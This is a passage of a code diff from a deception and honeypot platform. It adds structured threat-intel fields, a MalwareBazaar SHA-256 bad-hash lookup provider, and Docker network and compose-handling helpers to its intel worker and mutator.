 # max wait (ms) before flushing a partial batch. Larger batches reduce
--- a/decnet/fleet/reconciler.py
+++ b/decnet/fleet/reconciler.py
@@ -128,8 +128,6 @@ async def reconcile_once(
    container_states = await asyncio.to_thread(
        _collect_container_states, docker_client_factory,
    )
-    docker_known = container_states is not None
-
    json_names = {d.name for d in json_deckies}

    # 1. INSERT: present in JSON, absent from DB.
@@ -138,7 +136,7 @@ async def reconcile_once(
            continue
        new_state = (
            _aggregate_decky_state(d.name, list(d.services), container_states)
-            if docker_known else "running"
+            if container_states is not None else "running"
        )
        row_host = d.host_uuid or host_uuid
        await repo.upsert_fleet_decky({
@@ -168,7 +166,7 @@ async def reconcile_once(
            )

    # 3. STATE: present in both, docker says something fresh.
-    if docker_known:
+    if container_states is not None:
        for d in json_deckies:
            existing = db_by_name.get(d.name)
            if existing is None:
--- a/decnet/geoip/rir/provider.py
+++ b/decnet/geoip/rir/provider.py
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
 from decnet.geoip.lookup import Lookup
 from decnet.geoip.paths import ensure_root
 from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
-from decnet.geoip.rir.parse import parse_file
+from decnet.geoip.rir.parse import Range, parse_file

 logger = logging.getLogger("decnet.geoip.rir.provider")

@@ -45,7 +45,7 @@ class RirProvider(Provider):
            except Exception as exc:
                logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)

-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/intel/abuseipdb.py
+++ b/decnet/intel/abuseipdb.py
@@ -17,7 +17,6 @@ later if operators report drift.
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
        data = payload.get("data") or {}
        score = int(data.get("abuseConfidenceScore") or 0)
        verdict = _score_to_verdict(score)
+        # AbuseIPDB returns ``data.reports[*].categories`` — a list of
+        # int codes per report. Flatten the union across all recent
+        # reports so the IntelLifter sees the full activity profile,
+        # not just the most-recent report's categories. Sorted for
+        # determinism (matters for tests + for the bus payload diff).
+        categories: set[int] = set()
+        for report in data.get("reports") or []:
+            if not isinstance(report, dict):
+                continue
+            for cat in report.get("categories") or []:
+                if isinstance(cat, int):
+                    categories.add(cat)
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "abuseipdb_score": score,
-                "abuseipdb_raw": json.dumps(data),
+                "abuseipdb_categories": sorted(categories),
+                "abuseipdb_raw": data,
                "abuseipdb_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/base.py
+++ b/decnet/intel/base.py
@@ -78,3 +78,33 @@ class IntelProvider(ABC):
        entire IP. Implementations should also respect
        ``self._semaphore`` to bound in-flight calls.
        """
+
+
+class MalHashProvider(ABC):
+    """Abstract bad-hash lookup provider.
+
+    Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
+    vs IP), different consumer (the email ingester at observation time,
+    not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
+    the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
+
+    Concrete impls today:
+
+    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
+      shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
+
+    Future impls (paid VirusTotal subscription, in-house allowlist) plug
+    in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
+    """
+
+    # Short provider identifier, set by each concrete subclass
+    # (``MalwareBazaarProvider`` uses ``"malwarebazaar"``).
+    name: str
+
+    @abstractmethod
+    async def is_known_bad(self, sha256: str) -> bool:
+        """Return whether *sha256* is on this provider's bad-hash list.
+
+        MUST NOT raise — return ``False`` on any error (the caller is the
+        ingester, not a worker; an exception here would taint a totally
+        unrelated bus payload). The provider is responsible for logging
+        its own errors.
+        """
--- a/decnet/intel/factory.py
+++ b/decnet/intel/factory.py
@@ -21,7 +21,7 @@ from __future__ import annotations
 import os
 from typing import List

-from decnet.intel.base import IntelProvider
+from decnet.intel.base import IntelProvider, MalHashProvider

 _KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")

@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
    return [p.strip().lower() for p in raw.split(",") if p.strip()]


+_mal_hash_singleton: MalHashProvider | None = None
+_mal_hash_initialized: bool = False
+
+
+def get_mal_hash_provider() -> MalHashProvider | None:
+    """Return the process-wide malware-hash lookup provider.
+
+    Counterpart of :func:`get_intel_providers` for the file SHA-256
+    keyspace; its consumer is the email ingester at observation time
+    rather than the IP-keyed intel-worker fan-out. The decision is made
+    once, on the first call, and cached: ``None`` when intel is disabled
+    wholesale, otherwise a provider whose :meth:`is_known_bad`
+    self-disables to a no-op when ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is
+    unset, so the ingester never has to special-case "no provider
+    configured."
+    """
+    global _mal_hash_singleton, _mal_hash_initialized
+    if not _mal_hash_initialized:
+        # Flag first: the decision is attempted exactly once per process
+        # (or per test reset), even if building the provider fails.
+        _mal_hash_initialized = True
+        if _enabled():
+            from decnet.intel.mal_hash import MalwareBazaarProvider
+            _mal_hash_singleton = MalwareBazaarProvider()
+        else:
+            _mal_hash_singleton = None
+    return _mal_hash_singleton
+
+
+def _reset_mal_hash_provider_for_testing() -> None:
+    """Test hook — forget the cached provider and the "initialized" flag.
+
+    The next ``get_mal_hash_provider()`` call takes its first-call path
+    again and therefore re-reads the environment.
+    """
+    global _mal_hash_initialized, _mal_hash_singleton
+    _mal_hash_initialized, _mal_hash_singleton = False, None
+
+
 def get_intel_providers() -> List[IntelProvider]:
    """Return the configured threat-intel providers.

--- a/decnet/intel/feodo.py
+++ b/decnet/intel/feodo.py
@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
 """
 from __future__ import annotations

-import json
 import time
 from datetime import datetime, timezone
 from typing import Any, Optional
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
                verdict=None,  # absence ≠ "benign", let other providers speak
                column_updates={
                    "feodo_listed": False,
-                    "feodo_raw": "{}",
+                    "feodo_malware_family": None,
+                    "feodo_raw": {},
                    "feodo_queried_at": datetime.now(timezone.utc),
                },
            )
+        family_obj = entry.get("malware")
+        family = (
+            family_obj if isinstance(family_obj, str) and family_obj else None
+        )
        return IntelResult(
            provider=self.name,
            verdict="malicious",
            column_updates={
                "feodo_listed": True,
-                "feodo_raw": json.dumps(entry),
+                "feodo_malware_family": family,
+                "feodo_raw": entry,
                "feodo_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/greynoise.py
+++ b/decnet/intel/greynoise.py
@@ -25,7 +25,6 @@ Status code semantics:
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
                verdict="unknown",
                column_updates={
                    "greynoise_classification": "unknown",
-                    "greynoise_raw": json.dumps({"message": "not seen"}),
+                    "greynoise_name": None,
+                    "greynoise_tags": [],
+                    "greynoise_raw": {"message": "not seen"},
                    "greynoise_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):

        classification = (data.get("classification") or "unknown").lower()
        verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
+        # The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
+        # "Censys") but no behavioral tag list — the tag taxonomy is
+        # paid-tier only. Persist whatever we got; a future non-Community
+        # provider may populate ``greynoise_tags``.
+        name_obj = data.get("name")
+        name = name_obj if isinstance(name_obj, str) and name_obj else None
+        tags_obj = data.get("tags")
+        tags: list[str] = (
+            [t for t in tags_obj if isinstance(t, str)]
+            if isinstance(tags_obj, list) else []
+        )
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "greynoise_classification": classification,
-                "greynoise_raw": json.dumps(data),
+                "greynoise_name": name,
+                "greynoise_tags": tags,
+                "greynoise_raw": data,
                "greynoise_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/mal_hash.py
+++ b/decnet/intel/mal_hash.py
@@ -0,0 +1,195 @@
+"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
+
+Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
+shape, but operates on the SHA-256 keyspace instead of IPs and so
+implements :class:`decnet.intel.base.MalHashProvider` rather than
+:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
+
+Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
+``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
+sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
+30 MB resident as a ``set[str]`` of hex-lowercased hashes.
+
+Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
+the provider logs one warning at first refresh attempt and disables
+itself for the process lifetime — :meth:`is_known_bad` returns ``False``
+without ever making a network call. The ingester treats that the same
+as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
+bus payload (which is exactly what the predicate's ``is True`` check
+does today, so the silent-no-op is behaviorally identical to "lane not
+shipped yet").
+"""
+from __future__ import annotations
+
+import csv
+import io
+import os
+import time
+import zipfile
+from typing import Optional
+
+from decnet.intel.base import MalHashProvider
+from decnet.logging import get_logger
+from decnet.net.http import stealth_client
+
+log = get_logger("intel.mal_hash")
+
+_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
+_DEFAULT_REFRESH_S = 86_400.0  # 24h — feed is daily, no need to hammer
+_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
+_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
+
+
+def _read_refresh_interval() -> float:
+    """Return the feed refresh interval in seconds, read from the environment.
+
+    Reads ``DECNET_MAL_HASH_REFRESH_INTERVAL_S``. Falls back to the
+    default (with a warning) when the variable is set to something that
+    is not a usable interval: unparseable text, ``nan``, or a negative
+    number. ``float()`` parses ``"nan"`` without complaint, and a NaN
+    interval makes the staleness comparison in ``_ensure_fresh``
+    permanently false, so the feed would never be refreshed after the
+    first load; a negative interval makes it permanently true, so every
+    lookup would trigger a download.
+    """
+    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
+    if raw is None:
+        return _DEFAULT_REFRESH_S
+    try:
+        value = float(raw)
+    except ValueError:
+        log.warning(
+            "%s=%r not a float; falling back to default %.0f",
+            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
+        )
+        return _DEFAULT_REFRESH_S
+    # ``value >= 0`` is False for NaN as well as for negative numbers.
+    if not value >= 0:
+        log.warning(
+            "%s=%r is not a non-negative interval; falling back to default %.0f",
+            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
+        )
+        return _DEFAULT_REFRESH_S
+    return value
+
+
+class MalwareBazaarProvider(MalHashProvider):
+    """Bulk SHA-256 lookup against MalwareBazaar's full export.
+
+    The parsed feed is held in memory as a set of lowercase hex digests
+    and fetched again once it is older than ``refresh_interval_s``.
+    Without an auth key the provider is disabled and never touches the
+    network.
+
+    A failed refresh is not retried for ``_FAILURE_BACKOFF_S`` seconds.
+    Without that pause every lookup made while the feed is unreachable
+    would start its own download attempt (up to the 60 s client timeout)
+    inline in the caller.
+    """
+
+    name = "malwarebazaar"
+
+    # Minimum pause, in seconds, after a failed refresh before retrying.
+    _FAILURE_BACKOFF_S: float = 300.0
+    # ``time.monotonic()`` of the most recent failed refresh; ``None`` when
+    # the last attempt succeeded or none was made yet. Class-level default
+    # so instances created without ``__init__`` still have the attribute.
+    _last_failure_at: Optional[float] = None
+
+    def __init__(
+        self,
+        *,
+        auth_key: Optional[str] = None,
+        refresh_interval_s: Optional[float] = None,
+    ) -> None:
+        """Configure the provider.
+
+        ``auth_key`` falls back to ``DECNET_MALWAREBAZAAR_AUTH_KEY``; an
+        empty value counts as unset. ``refresh_interval_s`` falls back to
+        ``_read_refresh_interval()``.
+        """
+        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
+        self._refresh_interval_s = (
+            refresh_interval_s
+            if refresh_interval_s is not None
+            else _read_refresh_interval()
+        )
+        self._known: set[str] = set()
+        self._loaded_at: float = 0.0
+        self._last_error: Optional[str] = None
+        self._last_failure_at = None
+        self._disabled_warned: bool = False
+
+    @property
+    def disabled(self) -> bool:
+        """True when no auth key is configured."""
+        return self._auth_key is None
+
+    async def _refresh(self) -> Optional[str]:
+        """Refetch the bulk feed. Returns an error string or ``None``.
+
+        The in-memory set is only replaced when the download succeeded,
+        parsed, and yielded at least one hash; on any failure the
+        previous set stays in place.
+        """
+        if self._auth_key is None:
+            return "no auth key"
+        try:
+            async with stealth_client(timeout=60.0) as client:
+                resp = await client.get(
+                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
+                )
+        except Exception as exc:  # noqa: BLE001
+            return f"network: {exc}"
+        if resp.status_code != 200:
+            return f"HTTP {resp.status_code}"
+        body = resp.content
+        try:
+            new_known = _parse_dump(body)
+        except Exception as exc:  # noqa: BLE001
+            return f"parse: {exc}"
+        if not new_known:
+            return "feed: empty"
+        self._known = new_known
+        self._loaded_at = time.monotonic()
+        self._last_error = None
+        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
+        return None
+
+    async def _ensure_fresh(self) -> None:
+        """Refresh the in-memory set if it is empty or past its TTL.
+
+        When disabled, logs the "disabled" warning once and returns. A
+        failure reported by ``_refresh`` is stored in ``_last_error``,
+        logged, and starts the retry backoff.
+        """
+        if self.disabled:
+            if not self._disabled_warned:
+                log.warning(
+                    "R0046 mal_hash_match disabled: %s unset",
+                    _AUTH_KEY_ENV,
+                )
+                self._disabled_warned = True
+            return
+        now = time.monotonic()
+        stale = (
+            not self._known
+            or (now - self._loaded_at) >= self._refresh_interval_s
+        )
+        if not stale:
+            return
+        failed_at = self._last_failure_at
+        if failed_at is not None and (now - failed_at) < self._FAILURE_BACKOFF_S:
+            # Still inside the backoff window of the last failed attempt.
+            return
+        err = await self._refresh()
+        if err:
+            self._last_error = err
+            self._last_failure_at = time.monotonic()
+            log.warning("malwarebazaar refresh failed: %s", err)
+        else:
+            self._last_failure_at = None
+
+    async def is_known_bad(self, sha256: str) -> bool:
+        """Return whether ``sha256`` is in the loaded feed. Never raises.
+
+        Returns ``False`` when the provider is disabled, when the feed
+        could not be loaded, or when ``sha256`` is not a string.
+        """
+        try:
+            # Called even when disabled: that is the only place the
+            # one-time "disabled" warning is emitted, and it makes no
+            # network call in that state.
+            await self._ensure_fresh()
+        except Exception as exc:  # noqa: BLE001
+            # Belt and braces: _ensure_fresh swallows refresh failures
+            # but a bug in there shouldn't blow up the ingester payload.
+            log.exception("malwarebazaar refresh raised: %s", exc)
+            return False
+        if self.disabled or not isinstance(sha256, str):
+            return False
+        return sha256.lower() in self._known
+
+
+def _parse_dump(body: bytes) -> set[str]:
+    """Turn a MalwareBazaar dump (zipped or plain CSV) into a hash set.
+
+    A body starting with the ZIP magic ``PK`` is opened as an archive and
+    its first ``.csv`` member is used; anything else is taken to be the
+    CSV itself (some abuse.ch flavours of the same feed family ship plain
+    CSV). The bytes are decoded as UTF-8 with replacement characters and
+    handed to ``_extract_hashes``, which lowercases hashes and drops
+    non-hex / wrong-length values.
+
+    Raises ``ValueError`` when the archive has no ``.csv`` member.
+    """
+    if body[:2] != b"PK":
+        return _extract_hashes(body.decode("utf-8", errors="replace"))
+
+    with zipfile.ZipFile(io.BytesIO(body)) as archive:
+        member = next(
+            (name for name in archive.namelist() if name.lower().endswith(".csv")),
+            None,
+        )
+        if member is None:
+            raise ValueError("zip has no .csv member")
+        raw_csv = archive.read(member)
+    return _extract_hashes(raw_csv.decode("utf-8", errors="replace"))
+
+
+def _extract_hashes(text: str) -> set[str]:
+    """Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
+
+    The dump prefaces the table with ``#``-prefixed comment lines, and
+    the column header itself is one of them
+    (``# "first_seen_utc","sha256_hash",...``), so the header is looked
+    for in the comment lines first and in the first data row second.
+    When no header names the column, column 0 is used. Fields in the dump
+    are separated by ``", "``; ``skipinitialspace`` lets ``csv.reader``
+    still honour the quoting (the ``signature`` column contains commas).
+
+    Every non-comment row is examined; a header row is discarded by the
+    same check that discards junk: only 64-character lowercase-hex cells
+    are kept.
+    """
+
+    def _normalise(cell: str) -> str:
+        return cell.strip().strip('"').lower()
+
+    def _header_index(line: str) -> Optional[int]:
+        """Index of the ``sha256_hash`` column named on *line*, if any."""
+        cells = next(csv.reader([line], skipinitialspace=True), [])
+        names = [_normalise(c) for c in cells]
+        return names.index("sha256_hash") if "sha256_hash" in names else None
+
+    col: Optional[int] = None
+    data_lines: list[str] = []
+    for line in text.splitlines():
+        stripped = line.strip()
+        if not stripped:
+            continue
+        if stripped.startswith("#"):
+            if col is None and "sha256_hash" in stripped.lower():
+                col = _header_index(stripped.lstrip("#"))
+            continue
+        data_lines.append(line)
+    if not data_lines:
+        return set()
+
+    if col is None:
+        col = _header_index(data_lines[0])
+    if col is None:
+        # Fallback when no header names the column: take the first
+        # column rather than giving up; the hex check below still keeps
+        # non-hash values out of the set.
+        col = 0
+
+    hexdigits = frozenset("0123456789abcdef")
+    out: set[str] = set()
+    for row in csv.reader(data_lines, skipinitialspace=True):
+        if len(row) <= col:
+            continue
+        cell = _normalise(row[col])
+        if len(cell) == 64 and hexdigits.issuperset(cell):
+            out.add(cell)
+    return out
--- a/decnet/intel/threatfox.py
+++ b/decnet/intel/threatfox.py
@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
                verdict=None,  # absence is not a benign signal
                column_updates={
                    "threatfox_listed": False,
-                    "threatfox_raw": "{}",
+                    "threatfox_threat_types": [],
+                    "threatfox_ioc_types": [],
+                    "threatfox_malware_families": [],
+                    "threatfox_raw": {},
                    "threatfox_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):

        data = payload.get("data") or []
        listed = bool(data)
+        # Each match in ``data`` carries threat_type / ioc_type / malware
+        # (canonical family). The IntelLifter dispatches ATT&CK techniques
+        # off ``threat_type`` (botnet_cc / payload_delivery / payload /
+        # cc_skimming); the other two columns are evidence and SIEM
+        # context. Sets are flattened across matches and serialised
+        # sorted for determinism.
+        threat_types: set[str] = set()
+        ioc_types: set[str] = set()
+        families: set[str] = set()
+        if isinstance(data, list):
+            for entry in data:
+                if not isinstance(entry, dict):
+                    continue
+                tt = entry.get("threat_type")
+                if isinstance(tt, str) and tt:
+                    threat_types.add(tt)
+                it = entry.get("ioc_type")
+                if isinstance(it, str) and it:
+                    ioc_types.add(it)
+                family = entry.get("malware") or entry.get("malware_printable")
+                if isinstance(family, str) and family:
+                    families.add(family)
        return IntelResult(
            provider=self.name,
            verdict="malicious" if listed else None,
            column_updates={
                "threatfox_listed": listed,
-                "threatfox_raw": json.dumps(data),
+                "threatfox_threat_types": sorted(threat_types),
+                "threatfox_ioc_types": sorted(ioc_types),
+                "threatfox_malware_families": sorted(families),
+                "threatfox_raw": data,
                "threatfox_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/worker.py
+++ b/decnet/intel/worker.py
@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
    return None


+def _build_intel_event_payload(
+    attacker_uuid: str,
+    ip: str,
+    row: dict[str, Any],
+    providers: list[IntelProvider],
+) -> dict[str, Any]:
+    """Project the AttackerIntel row into the bus event the TTP worker
+    consumes as ``source_kind="intel"``.
+
+    Identity fields and provider names come first, then per-provider
+    columns read from ``row``: scalars pass through (``None`` when
+    absent), list columns fall back to ``[]`` when missing or falsy.
+    """
+    # (column, is_list) in emission order: AbuseIPDB, GreyNoise,
+    # Feodo, ThreatFox.
+    projected = (
+        ("abuseipdb_score", False), ("abuseipdb_categories", True),
+        ("greynoise_classification", False), ("greynoise_name", False),
+        ("greynoise_tags", True),
+        ("feodo_listed", False), ("feodo_malware_family", False),
+        ("threatfox_listed", False), ("threatfox_threat_types", True),
+        ("threatfox_ioc_types", True), ("threatfox_malware_families", True),
+    )
+    event: dict[str, Any] = {"attacker_uuid": attacker_uuid, "attacker_ip": ip}
+    event["aggregate_verdict"] = row.get("aggregate_verdict")
+    event["providers"] = [provider.name for provider in providers]
+    for column, is_list in projected:
+        value = row.get(column)
+        event[column] = (value or []) if is_list else value
+    return event
+
+
 async def _enrich_one(
    attacker_uuid: str,
    ip: str,
@@ -172,12 +204,9 @@ async def run_intel_loop(
                        await publish_safely(
                            bus,
                            _topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
-                            {
-                                "attacker_uuid": attacker_uuid,
-                                "attacker_ip": ip,
-                                "aggregate_verdict": row.get("aggregate_verdict"),
-                                "providers": [p.name for p in providers],
-                            },
+                            _build_intel_event_payload(
+                                attacker_uuid, ip, row, providers,
+                            ),
                            event_type=_topics.ATTACKER_INTEL_ENRICHED,
                        )
                    except Exception:  # noqa: BLE001
@@ -200,11 +229,11 @@ async def run_intel_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/logging/init.py
+++ b/decnet/logging/init.py
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
        self.component = component

    def filter(self, record: logging.LogRecord) -> bool:
-        record.decnet_component = self.component  # type: ignore[attr-defined]
+        record.decnet_component = self.component
        return True


@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
            span = trace.get_current_span()
            ctx = span.get_span_context()
            if ctx and ctx.trace_id:
-                record.otel_trace_id = format(ctx.trace_id, "032x")  # type: ignore[attr-defined]
-                record.otel_span_id = format(ctx.span_id, "016x")  # type: ignore[attr-defined]
+                record.otel_trace_id = format(ctx.trace_id, "032x")
+                record.otel_span_id = format(ctx.span_id, "016x")
            else:
-                record.otel_trace_id = "0"  # type: ignore[attr-defined]
-                record.otel_span_id = "0"  # type: ignore[attr-defined]
+                record.otel_trace_id = "0"
+                record.otel_span_id = "0"
        except Exception:
-            record.otel_trace_id = "0"  # type: ignore[attr-defined]
-            record.otel_span_id = "0"  # type: ignore[attr-defined]
+            record.otel_trace_id = "0"
+            record.otel_span_id = "0"
        return True


--- a/decnet/models.py
+++ b/decnet/models.py
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
    services: list[str] = PydanticField(..., min_length=1)
    distro: str          # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
    base_image: str      # Docker image for the base/IP-holder container
-    build_base: str = "debian:bookworm-slim"  # apt-compatible image for service Dockerfiles
+    build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"  # apt-compatible image for service Dockerfiles; digest pinned via distros.py
    hostname: str
    archetype: str | None = None  # archetype slug if spawned from an archetype profile
    service_config: dict[str, dict] = PydanticField(default_factory=dict)
--- a/decnet/mutator/engine.py
+++ b/decnet/mutator/engine.py
@@ -101,7 +101,10 @@ async def mutate_decky(

    try:
        # Wrap blocking call in thread
-        await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
+        cp = compose_path
+        await anyio.to_thread.run_sync(
+            lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
+        )
    except Exception as e:
        log.error("mutation failed decky=%s error=%s", decky_name, e)
        console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -161,6 +164,8 @@ async def mutate_all(
        if force or only is not None:
            due = True
        else:
+            if interval_mins is None:
+                continue
            elapsed_secs = now - decky.last_mutated
            due = elapsed_secs >= (interval_mins * 60)
            remaining = (interval_mins * 60) - elapsed_secs
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
        return 0
    drained = 0
    for topo in pending:
-        tid = topo["id"]
+        tid = topo.id
        try:
            await _deployer.resync_agent_topology(repo, tid)
            await repo.set_topology_resync(tid, False)
            drained += 1
            log.info("topology %s resynced to agent %s",
-                     tid, topo.get("target_host_uuid"))
+                     tid, topo.target_host_uuid)
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "topology %s resync failed (will retry): %s", tid, exc,
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/mutator/ops.py
+++ b/decnet/mutator/ops.py
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
    )


+async def _materialise_lan_change(
+    repo: Any,
+    topology_id: str,
+    *,
+    created: Optional[tuple[str, str, bool]] = None,
+    removed: Optional[str] = None,
+) -> None:
+    """Create or remove the docker bridge for a live LAN op + re-render compose.
+
+    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
+    write lands; ``created`` is ``(name, subnet, is_dmz)`` and
+    ``removed`` is a LAN name.  Skips when the topology is missing,
+    not active/degraded (a pending topology gets its networks created
+    at deploy time), or pinned to a swarm agent (cross-host
+    materialisation isn't implemented; the agent's apply_topology RPC
+    re-renders the whole compose at next push).
+
+    Docker failures — including building the client — are logged, not
+    re-raised (the DB row is the source of truth), and the compose
+    re-render still runs.  The docker client is closed on exit.
+    """
+    topology = await repo.get_topology(topology_id)
+    if topology is None or topology.status not in ("active", "degraded"):
+        return
+    if topology.target_host_uuid:
+        _log.info(
+            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
+            topology_id,
+        )
+        return
+
+    # Lazy imports — these pull in docker.py / network.py which both
+    # require the docker SDK; keeping them out of module-import keeps
+    # the mutator usable in test environments that stub docker.
+    from contextlib import closing
+    import docker
+    from decnet.engine.deployer import _topology_compose_path
+    from decnet.network import create_bridge_network, remove_bridge_network
+    from decnet.topology.compose import _network_name, write_topology_compose
+
+    try:
+        # Client creation is inside the try so its failure is logged too.
+        with closing(docker.from_env()) as client:
+            if created is not None:
+                name, subnet, is_dmz = created
+                net_name = _network_name(topology_id, name)
+                try:
+                    create_bridge_network(client, net_name, subnet, internal=not is_dmz)
+                except Exception as exc:  # noqa: BLE001
+                    # Not re-raised: operator can retry by remove + re-add.
+                    _log.error(
+                        "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
+                        topology_id, name, subnet, exc,
+                    )
+            if removed is not None:
+                net_name = _network_name(topology_id, removed)
+                try:
+                    remove_bridge_network(client, net_name)
+                except Exception as exc:  # noqa: BLE001
+                    _log.warning(
+                        "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
+                        topology_id, removed, exc,
+                    )
+    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
+        _log.error(
+            "live LAN materialisation crashed topology=%s: %s",
+            topology_id, exc,
+        )
+
+    # Re-render compose so the file on disk matches the DB.  Runs even
+    # when the docker step failed: a future redeploy will try to bring
+    # the network back from the compose definition.
+    try:
+        hydrated = await hydrate(repo, topology_id)
+    except Exception as exc:  # noqa: BLE001
+        _log.error("live LAN materialisation crashed topology=%s: %s", topology_id, exc)
+        return
+    if hydrated is None:
+        return
+    try:
+        write_topology_compose(hydrated, _topology_compose_path(topology_id))
+    except Exception as exc:  # noqa: BLE001
+        _log.warning(
+            "live LAN op: compose re-render failed topology=%s: %s",
+            topology_id, exc,
+        )
+
+
+def _is_buildx_wedge(exc: BaseException) -> bool:
+    """Report whether *exc* carries both buildx EROFS-wedge signatures.
+
+    The search text is ``exc.stderr`` (when present and truthy) joined
+    with ``str(exc)``, lower-cased.  Both sources are checked because
+    ``_compose_with_retry`` raises a synthetic CalledProcessError whose
+    ``stderr`` holds the recovery hint, which preserves the wedge
+    signatures verbatim.
+    """
+    from decnet.engine.deployer import (
+        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
+    )
+    # Exceptions without a ``stderr`` attribute (or with a falsy one)
+    # contribute an empty string to the search text.
+    captured = getattr(exc, "stderr", None)
+    stderr_text = str(captured) if captured else ""
+    searchable = (stderr_text + " " + str(exc)).lower()
+    wanted = (_BUILDX_WEDGE_SIGNATURE, _BUILDX_EROFS_SIGNATURE)
+    return all(signature in searchable for signature in wanted)
+
+
+async def _compose_up_with_buildkit_fallback(
+    *args: str, compose_file, label: str,
+) -> None:
+    """Run a compose command, retrying once on the legacy builder if buildx wedges.
+
+    ``_compose_with_retry(*args, compose_file=...)`` runs in a worker
+    thread.  If it raises and ``_is_buildx_wedge`` recognises the
+    error, a warning carrying *label* and the recovery commands is
+    logged and the command is re-run once with
+    ``env={"DOCKER_BUILDKIT": "0"}``.  Any other error — and a failing
+    retry — propagates to the caller.
+    """
+    import anyio
+    from decnet.engine.deployer import _compose_with_retry
+
+    def _first_attempt() -> None:
+        _compose_with_retry(*args, compose_file=compose_file)
+
+    def _legacy_attempt() -> None:
+        _compose_with_retry(
+            *args, compose_file=compose_file, env={"DOCKER_BUILDKIT": "0"},
+        )
+
+    try:
